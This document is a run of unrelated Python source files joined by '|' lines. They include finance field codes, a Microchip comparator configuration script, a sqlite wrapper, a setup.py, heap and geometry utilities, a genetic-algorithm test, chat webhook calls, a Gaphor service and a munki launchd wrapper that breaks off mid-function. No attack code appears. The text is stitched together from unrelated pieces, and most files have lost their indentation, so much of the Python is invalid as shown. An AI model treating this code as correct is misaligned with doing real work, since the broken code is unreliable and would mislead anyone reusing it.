|
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
'''
data information
----------------
:copyright (c) 2014 Xavier Bruhiere.
:license: Apache2.0, see LICENSE for more details.
'''
"""
# World exchanges characteristics
Exchanges = {
# Market code, from yahoo stock code to google market code (needed for
# reliable download)
# Later London = LON
#FIXME Forex is temporary
'cac40': {'symbol': '^FCHI',
'timezone': 'Europe/London',
'code': 1001,
'google_market': 'EPA'},
'forex': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1002,
'indexes': []},
'nasdaq': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1003,
'indexes': ['nasdaq', 'nyse'],
'google_market': 'NASDAQ'},
'nyse': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1004,
'google_market': 'NYSE'}
}
"""
yahooCode = {'ask': 'a', 'average daily volume': 'a2', 'ask size': 'a5',
'bid': 'b', 'ask rt': 'b2', 'bid rt': 'b3', 'dividend yield': 'y',
'book value': 'b4', 'bid size': 'b6', 'change and percent': 'c',
'change': 'c1', 'commission': 'c3', 'change rt': 'c6',
'after hours change rt': 'c8', 'dividend': 'd',
'last trade date': 'd1', 'trade date': 'd2', 'earnings': 'e',
'error': 'e1', 'eps estimate year': 'e7',
'eps estimate next year': 'e8', 'eps estimate next quarter': 'e9',
'float shares': 'f6', 'day low': 'g', 'day high': 'h',
'52-week low': 'j', '52-week high': 'k',
'holdings gain percent': 'g1', 'annualized gain': 'g3',
'holdings gain': 'g4', 'holdings gain percent rt': 'g5',
'holdings gain rt': 'g6', 'more info': 'i', 'order book rt': 'i5',
'market capitalization': 'j1', 'market cap rt': 'j3',
'EBITDA': 'j4', 'change from 52-week': 'j5',
'percent change from 52-week low': 'j6',
'last trade rt with time': 'k1', 'change percent rt': 'k2',
'last trade size': 'k3', 'change from 52-week high': 'k4',
'percent change from 52-week high': 'k5',
'last trade with time': 'l', 'last trade price': 'l1',
'high limit': 'l2', 'low limit': 'l3', 'day range': 'm',
'day range rt': 'm2', '50-day ma': 'm3', '200-day ma': 'm4',
'percent change from 50-day ma': 'm8', 'name': 'n', 'notes': 'n4',
'open': 'o', 'previous close': 'p', 'price paid': 'p1',
'change percent': 'p2', 'price/sales': 'p5', 'price/book': 'p6',
'ex-dividend date': 'q', 'p/e ratio': 'r', 'dividend date': 'r1',
'p/e ratio rt': 'r2', 'peg ratio': 'r5',
'price/eps estimate year': 'r6',
'price/eps estimate next year': 'r7', 'symbol': 's',
'shares owned': 's1', 'short ratio': 's7',
'last trade time': 't1', 'trade links': 't6',
'ticker trend': 't7', '1 year target price': 't8', 'volume': 'v',
'holdings value': 'v1', 'holdings value rt': 'v7',
'52-week range': 'w', 'day value change': 'w1',
'day value change rt': 'w4', 'stock exchange': 'x'}
|
"""*****************************************************************************
* Copyright (C) 2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
################################################################################
#### Register Information ####
################################################################################
cmpRegGroup = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]').getChildren()
cmpValGrp_CM1CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__CCH"]')
cmpValGrp_CM1CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__CREF"]')
cmpValGrp_CM1CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__EVPOL"]')
cmpValGrp_CM2CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__CREF"]')
cmpValGrp_CM2CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__CCH"]')
cmpValGrp_CM2CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__EVPOL"]')
cmpBitFld_CM1CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CCH"]')
cmpBitFld_CM1CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CREF"]')
cmpBitFld_CM1CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="EVPOL"]')
cmpBitFld_CM1CON_CPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CPOL"]')
cmpBitFld_CM1CON_COE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="COE"]')
cmpBitFld_CMSTAT_SIDL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CMSTAT"]/bitfield@[name="SIDL"]')
################################################################################
#### Global Variables ####
################################################################################
global interruptsChildren
interruptsChildren = ATDF.getNode('/avr-tools-device-file/devices/device/interrupts').getChildren()
################################################################################
#### Business Logic ####
################################################################################
def setCMPxInterruptData(status, index):
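    # Enable or disable the core interrupt vector, handler lock and handler name
    # symbols for comparator `index`, depending on `status`.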
Database.setSymbolValue("core", InterruptVector[index - 1], status, 1)
Database.setSymbolValue("core", InterruptHandlerLock[index - 1], status, 1)
interruptName = InterruptHandler[index - 1].split("_INTERRUPT_HANDLER")[0]
if status == True:
Database.setSymbolValue("core", InterruptHandler[index - 1], interruptName + "_InterruptHandler", 1)
else:
Database.setSymbolValue("core", InterruptHandler[index - 1], interruptName + "_Handler", 1)
def updateCMPxInterruptData(symbol, event):
symbolId = symbol.getID()
cmp_id = int((symbolId.replace("CMP", "")).replace("_INTERRUPT_ENABLE_COMMENT", ""))
status = int(cmpSym_CMxCON_EVPOL[cmp_id - 1].getSelectedValue()) != 0
if event["id"] == "CMP_CM" + str(cmp_id) + "CON_EVPOL":
setCMPxInterruptData(status, cmp_id)
if Database.getSymbolValue("core", InterruptVectorUpdate[cmp_id - 1].replace("core.", "")) == True and status == True:
symbol.setVisible(True)
else:
symbol.setVisible(False)
def _get_enblReg_parms(vectorNumber):
# This takes in vector index for interrupt, and returns the IECx register name as well as
# mask and bit location within it for given interrupt
index = int(vectorNumber / 32)
regName = "IEC" + str(index)
return regName
def _get_statReg_parms(vectorNumber):
# This takes in vector index for interrupt, and returns the IFSx register name as well as
# mask and bit location within it for given interrupt
index = int(vectorNumber / 32)
regName = "IFS" + str(index)
return regName
def _get_bitfield_names(node, outputList):
valueNodes = node.getChildren()
for bitfield in reversed(valueNodes): ## do this for all <value > entries for this bitfield
dict = {}
if bitfield.getAttribute("caption").lower() != "reserved": ## skip (unused) reserved fields
dict["desc"] = bitfield.getAttribute("caption")
dict["key"] = bitfield.getAttribute("caption")
## Get rid of leading '0x', and convert to int if was hex
value = bitfield.getAttribute("value")
if(value[:2] == "0x"):
temp = value[2:]
tempint = int(temp, 16)
else:
tempint = int(value)
dict["value"] = str(tempint)
outputList.append(dict)
def combineValues(symbol, event):
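    # Pack the CCH, CREF, EVPOL, CPOL and COE selections into their CMxCON bit
    # positions and update the hidden register-value symbol.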
symbolId = symbol.getID()
cmp_id = int((symbolId.replace("CM", "")).replace("CON_VALUE", "")) - 1
cchValue = cmpSym_CMxCON_CCH[cmp_id].getValue() << 0
crefValue = cmpSym_CMxCON_CREF[cmp_id].getValue() << 4
evpolValue = cmpSym_CMxCON_EVPOL[cmp_id].getValue() << 6
cpolValue = cmpSym_CMxCON_CPOL[cmp_id].getValue() << 13
coeValue = cmpSym_CMxCON_COE[cmp_id].getValue() << 14
cmconValue = crefValue + cchValue + evpolValue + cpolValue + coeValue
symbol.setValue(cmconValue, 2)
def getIRQIndex(string):
irq_index = "-1"
for param in interruptsChildren:
if "irq-index" in param.getAttributeList():
name = str(param.getAttribute("name"))
if string == name:
irq_index = str(param.getAttribute("irq-index"))
break
else:
break
return irq_index
def getVectorIndex(string):
vector_index = "-1"
for param in interruptsChildren:
name = str(param.getAttribute("name"))
if string == name:
vector_index = str(param.getAttribute("index"))
break
return vector_index
def updateCMPxClockWarningStatus(symbol, event):
symbol.setVisible(not event["value"])
################################################################################
#### Component ####
################################################################################
def instantiateComponent(cmpComponent):
global cmpInstanceName
global InterruptVector
global InterruptHandlerLock
global InterruptHandler
global InterruptVectorUpdate
global cmpSym_CMxCON_CREF
global cmpSym_CMxCON_CCH
global cmpSym_CMxCON_EVPOL
global cmpSym_CMxCON_CPOL
global cmpSym_CMxCON_COE
InterruptVector = []
InterruptHandler = []
InterruptHandlerLock = []
InterruptVectorUpdate = []
cmpSym_CMxCON_CREF = []
cmpSym_CMxCON_CCH = []
cmpSym_CMxCON_EVPOL = []
cmpSym_CMxCON_CPOL = []
cmpSym_CMxCON_COE = []
cmpInstanceName = cmpComponent.createStringSymbol("CMP_INSTANCE_NAME", None)
cmpInstanceName.setVisible(False)
cmpInstanceName.setDefaultValue(cmpComponent.getID().upper())
#Stop in Idle mode
if cmpBitFld_CMSTAT_SIDL != None:
cmpSym_CMSTAT_SIDL = cmpComponent.createBooleanSymbol("CMP_CMSTAT_SIDL", None)
cmpSym_CMSTAT_SIDL.setLabel(cmpBitFld_CMSTAT_SIDL.getAttribute("caption"))
cmpSym_CMSTAT_SIDL.setDefaultValue(False)
index = 1
for register in cmpRegGroup:
regName = str(register.getAttribute("name"))
if regName.startswith("CM") and regName.endswith("CON"):
index = int((regName.replace("CM", "")).replace("CON", ""))
cmpSym_Menu = cmpComponent.createMenuSymbol("CMP" + str(index) + "_MENU", None)
cmpSym_Menu.setLabel("Comparator " + str(index))
#Clock enable
Database.setSymbolValue("core", "CMP" + str(index) + "_CLOCK_ENABLE", True, 1)
#Positive input of Comparator
cmp1CREF_names = []
_get_bitfield_names(cmpValGrp_CM1CON_CREF, cmp1CREF_names)
cmpSym_CMxCON_CREF.append(index)
cmpSym_CMxCON_CREF[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_CREF", cmpSym_Menu)
cmpSym_CMxCON_CREF[index - 1].setLabel(cmpBitFld_CM1CON_CREF.getAttribute("caption"))
cmpSym_CMxCON_CREF[index - 1].setDefaultValue(0)
cmpSym_CMxCON_CREF[index - 1].setOutputMode("Value")
cmpSym_CMxCON_CREF[index - 1].setDisplayMode("Description")
for ii in cmp1CREF_names:
cmpSym_CMxCON_CREF[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Negative input of Comparator
cmp1CCH_names = []
_get_bitfield_names(cmpValGrp_CM1CON_CCH, cmp1CCH_names)
cmpSym_CMxCON_CCH.append(index)
cmpSym_CMxCON_CCH[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_CCH", cmpSym_Menu)
cmpSym_CMxCON_CCH[index - 1].setLabel(cmpBitFld_CM1CON_CCH.getAttribute("caption"))
cmpSym_CMxCON_CCH[index - 1].setDefaultValue(0)
cmpSym_CMxCON_CCH[index - 1].setOutputMode("Value")
cmpSym_CMxCON_CCH[index - 1].setDisplayMode("Description")
for ii in cmp1CCH_names:
cmpSym_CMxCON_CCH[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Edge selection for interrupt generation
cmp1EVPOL_names = []
_get_bitfield_names(cmpValGrp_CM1CON_EVPOL, cmp1EVPOL_names)
cmpSym_CMxCON_EVPOL.append(index)
cmpSym_CMxCON_EVPOL[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_EVPOL", cmpSym_Menu)
cmpSym_CMxCON_EVPOL[index - 1].setLabel(cmpBitFld_CM1CON_EVPOL.getAttribute("caption"))
cmpSym_CMxCON_EVPOL[index - 1].setDefaultValue(0)
cmpSym_CMxCON_EVPOL[index - 1].setOutputMode("Value")
cmpSym_CMxCON_EVPOL[index - 1].setDisplayMode("Description")
for ii in cmp1EVPOL_names:
cmpSym_CMxCON_EVPOL[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Comparator output invert
cmpSym_CMxCON_CPOL.append(index)
cmpSym_CMxCON_CPOL[index - 1] = cmpComponent.createBooleanSymbol("CMP_CM" + str(index) + "CON_CPOL", cmpSym_Menu)
cmpSym_CMxCON_CPOL[index - 1].setLabel(cmpBitFld_CM1CON_CPOL.getAttribute("caption"))
#Comparator output on pin
cmpSym_CMxCON_COE.append(index)
cmpSym_CMxCON_COE[index - 1] = cmpComponent.createBooleanSymbol("CMP_CM" + str(index) + "CON_COE", cmpSym_Menu)
cmpSym_CMxCON_COE[index - 1].setLabel(cmpBitFld_CM1CON_COE.getAttribute("caption"))
#Collecting user input to combine into CMPxCON register
#CMPxCON is updated every time a user selection changes
cmpSym_CMP1CON = cmpComponent.createHexSymbol("CM" + str(index) + "CON_VALUE", None)
cmpSym_CMP1CON.setDefaultValue(0)
cmpSym_CMP1CON.setVisible(False)
cmpSym_CMP1CON.setDependencies(combineValues, ["CMP_CM" + str(index) + "CON_CREF", "CMP_CM" + str(index) + "CON_CCH", "CMP_CM" + str(index) + "CON_EVPOL", "CMP_CM" + str(index) + "CON_CPOL", "CMP_CM" + str(index) + "CON_COE"])
#Calculate the proper interrupt registers using IRQ#
cmpxIrq = "COMPARATOR_" + str(index)
InterruptVector.append(cmpxIrq + "_INTERRUPT_ENABLE")
InterruptHandler.append(cmpxIrq + "_INTERRUPT_HANDLER")
InterruptHandlerLock.append(cmpxIrq + "_INTERRUPT_HANDLER_LOCK")
InterruptVectorUpdate.append("core." + cmpxIrq + "_INTERRUPT_ENABLE_UPDATE")
cmpxIrq_index = int(getIRQIndex(cmpxIrq))
if cmpxIrq_index == -1:
cmpxIrq_index = int(getVectorIndex(cmpxIrq))
cmpxEnblRegName = _get_enblReg_parms(cmpxIrq_index)
cmpxStatRegName = _get_statReg_parms(cmpxIrq_index)
#CMPx IEC REG
cmpxIEC = cmpComponent.createStringSymbol("CMP" + str(index) + "_IEC_REG", None)
cmpxIEC.setDefaultValue(cmpxEnblRegName)
cmpxIEC.setVisible(False)
#CMPx IFS REG
cmpxIFS = cmpComponent.createStringSymbol("CMP" + str(index) + "_IFS_REG", None)
cmpxIFS.setDefaultValue(cmpxStatRegName)
cmpxIFS.setVisible(False)
############################################################################
#### Dependency ####
############################################################################
# EVIC Dynamic settings
# Dependency Status
cmpSymIntxEnComment = cmpComponent.createCommentSymbol("CMP" + str(index) + "_INTERRUPT_ENABLE_COMMENT", cmpSym_Menu)
cmpSymIntxEnComment.setVisible(False)
cmpSymIntxEnComment.setLabel("Warning!!! Comparator " + str(index) + " Interrupt is Disabled in Interrupt Manager")
cmpSymIntxEnComment.setDependencies(updateCMPxInterruptData, ["CMP_CM" + str(index) + "CON_EVPOL", InterruptVectorUpdate[index - 1]])
# Clock Warning status
cmpSym_ClkxEnComment = cmpComponent.createCommentSymbol("CMP" + str(index) + "_CLOCK_ENABLE_COMMENT", cmpSym_Menu)
cmpSym_ClkxEnComment.setLabel("Warning!!! Comparator " + str(index) + " Peripheral Clock is Disabled in Clock Manager")
cmpSym_ClkxEnComment.setVisible(False)
cmpSym_ClkxEnComment.setDependencies(updateCMPxClockWarningStatus, ["core.CMP" + str(index) + "_CLOCK_ENABLE"])
cmpSym_Count = cmpComponent.createIntegerSymbol("CMP_COUNT", cmpSym_Menu)
cmpSym_Count.setDefaultValue(index)
cmpSym_Count.setVisible(False)
############################################################################
#### Code Generation ####
############################################################################
configName = Variables.get("__CONFIGURATION_NAME")
cmpHeader1File = cmpComponent.createFileSymbol("CMP_HEADER1", None)
cmpHeader1File.setMarkup(True)
cmpHeader1File.setSourcePath("../peripheral/cmp_00866/templates/plib_cmp.h.ftl")
cmpHeader1File.setOutputName("plib_" + cmpInstanceName.getValue().lower() + ".h")
cmpHeader1File.setDestPath("peripheral/cmp/")
cmpHeader1File.setProjectPath("config/" + configName + "/peripheral/cmp/")
cmpHeader1File.setType("HEADER")
cmpHeader1File.setOverwrite(True)
cmpSource1File = cmpComponent.createFileSymbol("CMP_SOURCE1", None)
cmpSource1File.setMarkup(True)
cmpSource1File.setSourcePath("../peripheral/cmp_00866/templates/plib_cmp.c.ftl")
cmpSource1File.setOutputName("plib_" + cmpInstanceName.getValue().lower() + ".c")
cmpSource1File.setDestPath("peripheral/cmp/")
cmpSource1File.setProjectPath("config/" + configName + "/peripheral/cmp/")
cmpSource1File.setType("SOURCE")
cmpSource1File.setOverwrite(True)
cmpSystemInitFile = cmpComponent.createFileSymbol("CMP_INIT", None)
cmpSystemInitFile.setType("STRING")
cmpSystemInitFile.setOutputName("core.LIST_SYSTEM_INIT_C_SYS_INITIALIZE_PERIPHERALS")
cmpSystemInitFile.setSourcePath("../peripheral/cmp_00866/templates/system/initialization.c.ftl")
cmpSystemInitFile.setMarkup(True)
cmpSystemDefFile = cmpComponent.createFileSymbol("CMP_DEF", None)
cmpSystemDefFile.setType("STRING")
cmpSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
cmpSystemDefFile.setSourcePath("../peripheral/cmp_00866/templates/system/definitions.h.ftl")
cmpSystemDefFile.setMarkup(True)
|
import attr
@attr.dataclass
class License:
features: str
nlevel: int
software_id: str
|
from .file_record import File
import sqlite3
class Database:
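    # Thin wrapper around a sqlite3 connection plus the canned SQL statements used below.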
def __init__(self):
self.conn = {}
self.queries = {}
def cursor(self):
return self.conn.cursor()
def init(self):
self.conn = sqlite3.connect('db_files/prv.db', check_same_thread=False)
self.queries = {
"Find_file_hash": "SELECT * FROM files WHERE hash = ? LIMIT 1;",
"Find_file_url": "SELECT * FROM files WHERE url = ? LIMIT 1;",
"Find_url_hash": "SELECT * FROM shortened WHERE hash = ? LIMIT 1;",
"Find_url_short": "SELECT * FROM shortened WHERE short = ? LIMIT 1;",
"Get_user_files": "SELECT * FROM files WHERE user = ?",
"Get_user_short": "SELECT * FROM shortened WHERE user = ?;",
"Insert_file": "INSERT INTO files VALUES (?, ?, ?, ?, ?);",
"Insert_short": "INSERT INTO shortened VALUES (?, ?, ?, ?);",
}
database = Database()
database.init()
def get_user_files(userID):
cursor = database.cursor()
cursor.execute(database.queries["Get_user_files"], (userID,))
database.conn.commit()
files = cursor.fetchall()
cursor.execute(database.queries["Get_user_short"], (userID,))
database.conn.commit()
shorts = cursor.fetchall()
cursor.close()
return files, shorts
def find(where, what):
cursor = database.cursor()
cursor.execute(database.queries['Find_' + where], (what,))
database.conn.commit()
result = cursor.fetchone()
cursor.close()
return result
def add_short(short, original, hash, userID):
cursor = database.cursor()
cursor.execute(database.queries['Insert_short'], (short, original, hash, userID))
database.conn.commit()
result = cursor.lastrowid
cursor.close()
return result
def add_file(fileRecord: File, userID):
cursor = database.cursor()
cursor.execute(database.queries['Insert_file'], (fileRecord.hash,
fileRecord.realName,
fileRecord.extension,
fileRecord.url,
userID))
database.conn.commit()
result = cursor.lastrowid
cursor.close()
return result
|
import setuptools
from distutils.core import setup
with open("README.md", "r") as fh:
LONG_DESCRIPTION = fh.read()
def setup_package():
metadata = dict(name='deepstack',
packages=['deepstack'],
maintainer='Julio Borges',
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
description='DeepStack: Ensembles for Deep Learning',
license='MIT',
url='https://github.com/jcborges/DeepStack',
download_url='https://github.com/jcborges/DeepStack/archive/v_0.0.9.tar.gz',
version='0.0.9',
install_requires=[
'numpy>=1.16.4',
'keras>=2.2.5',
'tensorflow>=1.14.0',
'scikit-learn>=0.21.2'
],
)
setup(**metadata)
if __name__ == "__main__":
setup_package()
|
from module import *
def genToC(data, printLev, lastOneLine, lev, prevRef):
treeDepth = getDepth(data)
#print(treeDepth)
# return if printLev is activated,
# and lev exceeded it
if printLev != -1 and lev > printLev:
return
# if not dict type return
if not ( isinstance(data, dict) ):
return
# case nested lists
if (treeDepth > 1 or not lastOneLine):
# get key and values out of dictionary
for key, val in data.items():
# parse strings and print
keyRef = convKeyRef(key, prevRef)
header = parseToCitem(key, keyRef)
print(" "*lev + "- " + header )
# recursively call beneath items
genToC(val, printLev, lastOneLine, lev+1, keyRef+'_')
# case only one list is remaining, and
# printing in one line is activated
elif (treeDepth == 1 and lastOneLine):
finalItem = " "*lev + "- "
for key, val in data.items():
keyRef = convKeyRef(key, prevRef)
header = parseToCitem(key, keyRef)
finalItem = finalItem + header + " | "
# remove final additional " | "
finalItem = finalItem[:-3]
print(finalItem)
# no recursive call as this is a leaf list
###
import sys, json
# user's input
fileName = sys.argv[1]
printLev = int(sys.argv[2])  # str converted to int
lastOneLine = (sys.argv[3] == '1')  # str converted to bool
# open json file
f = open(fileName)
# convert to dict
data = json.load(f)
# print table of contents
genToC(data, printLev, lastOneLine, 0, '')
# close file
f.close()
|
from heapq import heappop, heappush, heappushpop, heapify, _heapify_max, _heappushpop_max, _siftdown_max, _siftup_max
from collections.abc import Iterable
from math import cos, ceil, pi, sin
from shapely.geometry import Polygon, Point
def circle(o, r, resolution=None):
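    # Approximate a circle of radius r around point o with shapely's buffer();
    # `resolution` is the target arc length per segment (default: 32 segments per quarter).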
if r <= 0:
raise ValueError("r must be a number greater than 0")
if resolution:
return o.buffer(r, int(ceil(pi * r * 2 / resolution / 4)))
else:
return o.buffer(r, 32)
def sector(o, r, angles, resolution=None):
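    # Build a circular sector of radius r between angles[0] and angles[1] (span < pi)
    # by clipping the circle with a triangle; the inputs are attached as attributes.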
c = circle(o, r, resolution)
if abs(angles[0] - angles[1]) >= pi:
raise ValueError('abs(angles[0] - angles[1]) must be less than Pi')
l = r / cos(abs(angles[0] - angles[1]) / 2)
triangle = Polygon(
[(o.x, o.y), (o.x + cos(angles[0]) * l, o.y + sin(angles[0]) * l),
(o.x + cos(angles[1]) * l, o.y + sin(angles[1]) * l)])
s = triangle.intersection(c)
s.o = o
s.r = r
s.angles = angles
return s
def partitions(origin, space, n):
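    # Split the area around `origin` into n equal angular sectors whose radius
    # covers the bounding box of `space`.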
bounds = space.bounds
r = Point((bounds[0], bounds[1])).distance(Point((bounds[2], bounds[3])))
return [sector(origin, r, [2 * pi / n * i, 2 * pi / n * (i + 1)]) for i in range(n)]
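# Max-heap push/pop built on heapq's private _siftdown_max/_siftup_max helpers.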
def heappush_max(heap, item):
heap.append(item)
_siftdown_max(heap, 0, len(heap) - 1)
def heappop_max(heap):
last = heap.pop()
if heap:
return_item = heap[0]
heap[0] = last
_siftup_max(heap, 0)
else:
return_item = last
return return_item
class MinHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop(self.items)
def push(self, item):
heappush(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class MaxHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop_max(self.items)
def push(self, item):
heappush_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NSmallestHolder:
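    # Bounded max-heap that keeps only the n smallest items pushed;
    # once full, first() returns the largest of them.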
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
_heapify_max(self.items)
else:
_heappushpop_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NLargestHolder:
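    # Bounded min-heap that keeps only the n largest items pushed;
    # once full, first() returns the smallest of them.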
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
heapify(self.items)
else:
heappushpop(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
def plot_points(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '.', markersize=size, color=color, label=label)
def plot_stars(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '*', markersize=size, color=color, label=label)
|
from unittest import TestCase
from NiaPy.algorithms.basic import GeneticAlgorithm
class MyBenchmark(object):
def __init__(self):
self.Lower = -5.12
self.Upper = 5.12
@classmethod
def function(cls):
def evaluate(D, sol):
val = 0.0
for i in range(D):
val = val + sol[i] * sol[i]
return val
return evaluate
class GATestCase(TestCase):
def setUp(self):
self.ga_custom = GeneticAlgorithm(10, 40, 1000, 4, 0.05, 0.4, MyBenchmark())
self.ga_griewank = GeneticAlgorithm(10, 40, 1000, 4, 0.05, 0.4, 'griewank')
def test_custom_works_fine(self):
self.assertTrue(self.ga_custom.run())
def test_griewank_works_fine(self):
self.assertTrue(self.ga_griewank.run())
|
from json import dumps
from httplib2 import Http
import config
def robot(content):
"""Hangouts Chat incoming webhook quickstart."""
url = config.robot["tsaitung"]
bot_message = {
'text' : content }
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
def robot_kgi(content):
"""Hangouts Chat incoming webhook quickstart."""
url = config.robot["KGI"]
bot_message = {
'text' : content }
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
|
import streamlink
from flask import jsonify
class decode:
pass
|
from pathlib import Path
from gi.repository import GLib, Gtk
from gaphor.abc import Service
from gaphor.core import event_handler
from gaphor.event import ModelLoaded, ModelSaved
from gaphor.ui import APPLICATION_ID
class RecentFiles(Service):
def __init__(self, event_manager, recent_manager=None):
self.event_manager = event_manager
self.recent_manager = recent_manager or Gtk.RecentManager.get_default()
self.event_manager.subscribe(self._on_filename_changed)
def shutdown(self):
self.event_manager.unsubscribe(self._on_filename_changed)
@event_handler(ModelLoaded, ModelSaved)
def _on_filename_changed(self, event):
filename = event.filename
if not filename:
return
uri = GLib.filename_to_uri(str(Path(filename).absolute()))
# Re-add, to ensure it's at the top of the list
self.remove(uri)
self.add(uri)
def add(self, uri):
meta = Gtk.RecentData()
meta.app_name = APPLICATION_ID
meta.app_exec = f"{GLib.get_prgname()} %u"
meta.mime_type = "application/x-gaphor"
self.recent_manager.add_full(uri, meta)
def remove(self, uri):
# From: https://gitlab.gnome.org/GNOME/pitivi/-/blob/58b5e3b6/pitivi/application.py#L271
try:
self.recent_manager.remove_item(uri)
except GLib.Error as e:
if e.domain != "gtk-recent-manager-error-quark":
raise e
|
#!/usr/bin/python
# encoding: utf-8
#
# Copyright 2011-2014 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
launchd.py
Created by Greg Neagle on 2011-07-22.
A wrapper for using launchd to run a process as root outside of munki's
process space. Needed to properly run /usr/sbin/softwareupdate, for example.
"""
import os
import subprocess
import time
import uuid
import munkicommon
import FoundationPlist
class LaunchdJobException(Exception):
'''Exception for launchctl errors and other errors from
this module.'''
pass
class Job(object):
'''launchd job object'''
def __init__(self, cmd, environment_vars=None):
tmpdir = munkicommon.tmpdir()
labelprefix = 'com.googlecode.munki.'
# create a unique id for this job
jobid = str(uuid.uuid1())
self.label = labelprefix + jobid
self.stdout_path = os.path.join(tmpdir, self.label + '.stdout')
self.stderr_path = os.path.join(tmpdir, self.label + '.stderr')
self.plist_path = os.path.join(tmpdir, self.label + '.plist')
self.stdout = None
self.stderr = None
self.plist = {}
self.plist['Label'] = self.label
self.plist['ProgramArguments'] = cmd
self.plist['StandardOutPath'] = self.stdout_path
self.plist['StandardErrorPath'] = self.stderr_path
if environment_vars:
self.plist['EnvironmentVariables'] = environment_vars
# write out launchd plist
FoundationPlist.writePlist(self.plist, self.plist_path)
# set owner, group and mode to those required
# by launchd
os.chown(self.plist_path, 0, 0)
os.chmod(self.plist_path, int('644', 8))
launchctl_cmd = ['/bin/launchctl', 'load', self.plist_path]
